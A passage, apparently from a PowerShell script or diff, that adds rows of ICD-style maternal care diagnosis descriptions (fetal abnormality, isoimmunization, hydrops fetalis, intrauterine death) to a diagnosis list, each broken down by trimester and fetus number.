fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) hereditary disease in fetus","Maternal care for (suspected) hereditary disease in fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from viral disease in mother","Maternal care for (suspected) damage to fetus from viral disease in mother, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus from alcohol","Maternal care for (suspected) damage to fetus from alcohol, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by drugs","Maternal care for (suspected) damage to fetus by drugs, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by radiation","Maternal care for (suspected) damage to fetus by radiation, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) damage to fetus by other medical procedures","Maternal care for (suspected) damage to fetus by other medical procedures, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other (suspected) fetal abnormality and damage","Maternal care for other (suspected) fetal abnormality and damage, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) fetal abnormality and damage, unspecified","Maternal care for (suspected) fetal abnormality and damage, unspecified, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, first trimester","Maternal care for anti-D [Rh] antibodies, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, second trimester","Maternal care for anti-D [Rh] antibodies, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, third trimester","Maternal care for anti-D [Rh] antibodies, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for anti-D [Rh] antibodies, unspecified trimester","Maternal care for anti-D [Rh] antibodies, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, first trimester","Maternal care for other rhesus isoimmunization, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, second trimester","Maternal care for other rhesus isoimmunization, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, third trimester","Maternal care for other rhesus isoimmunization, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other rhesus isoimmunization, unspecified trimester","Maternal care for other rhesus isoimmunization, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, first trimester","Maternal care for Anti-A sensitization, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, second trimester","Maternal care for Anti-A sensitization, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, third trimester","Maternal care for Anti-A sensitization, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for Anti-A sensitization, unspecified trimester","Maternal care for Anti-A sensitization, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, first trimester","Maternal care for other isoimmunization, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, second trimester","Maternal care for other isoimmunization, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, third trimester","Maternal care for other isoimmunization, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other isoimmunization, unspecified trimester","Maternal care for other isoimmunization, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, unspecified trimester","Maternal care for hydrops fetalis, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, first trimester","Maternal care for hydrops fetalis, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, second trimester","Maternal care for hydrops fetalis, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for hydrops fetalis, third trimester","Maternal care for hydrops fetalis, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for intrauterine death","Maternal care for intrauterine death, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, 